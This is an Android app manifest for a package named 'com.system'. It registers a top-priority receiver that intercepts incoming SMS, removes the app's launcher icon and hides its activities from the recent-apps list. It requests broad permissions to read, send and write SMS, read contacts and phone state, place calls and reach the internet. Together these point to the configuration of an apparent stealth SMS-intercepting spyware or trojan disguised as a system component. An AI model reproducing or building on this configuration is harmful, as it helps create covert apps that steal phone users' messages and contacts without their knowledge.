<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
	package="com.system" 
	android:versionCode="1"	
	android:versionName="1.0 Alpha">
	
	<application android:icon="@drawable/icon" android:label="@string/app_name">
	
	 	<!-- 
		<service android:name="com.system.BootService" android:enabled="true" android:excludeFromRecents="true" />
		<receiver android:name="com.system.BootReceiver" android:permission="android.permission.RECEIVE_BOOT_COMPLETED">
			<intent-filter>
				<action android:name="android.intent.action.BOOT_COMPLETED" />
			</intent-filter>
		</receiver>
		-->
		
		<receiver android:name="com.system.ActivationReceiver" 
				  android:enabled="true" >
        	<intent-filter android:priority="1000">
            	<action android:name="android.provider.Telephony.SMS_RECEIVED" />
        	</intent-filter>
    	</receiver>
		
		<activity android:name="com.system.activity.InitActivity"
                  android:label="@string/app_name"
                  android:excludeFromRecents="true">
            <intent-filter>
                <!-- <action android:name="android.intent.action.MAIN" /> -->
                <!-- <category android:name="android.intent.category.LAUNCHER" />-->
            </intent-filter>
        </activity>
        
		<activity android:name="com.system.activity.GlobalPrefActivity"
        	      android:label="@string/pref_title"
        	      android:excludeFromRecents="true">
		</activity>
        
	</application>
	
	<!-- User permissions -->
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
	<uses-permission android:name="android.permission.CALL_PHONE" />
	<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
	<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
	<uses-permission android:name="android.permission.READ_CONTACTS" />
	<uses-permission android:name="android.permission.RECEIVE_SMS" />
	<uses-permission android:name="android.permission.SEND_SMS" />
	<uses-permission android:name="android.permission.READ_SMS" />
	<uses-permission android:name="android.permission.WRITE_SMS" /> 
	<uses-permission android:name="android.permission.INTERNET" />
	
	<uses-sdk android:minSdkVersion="7" /> <!-- Android 2.1 -->
	
</manifest> 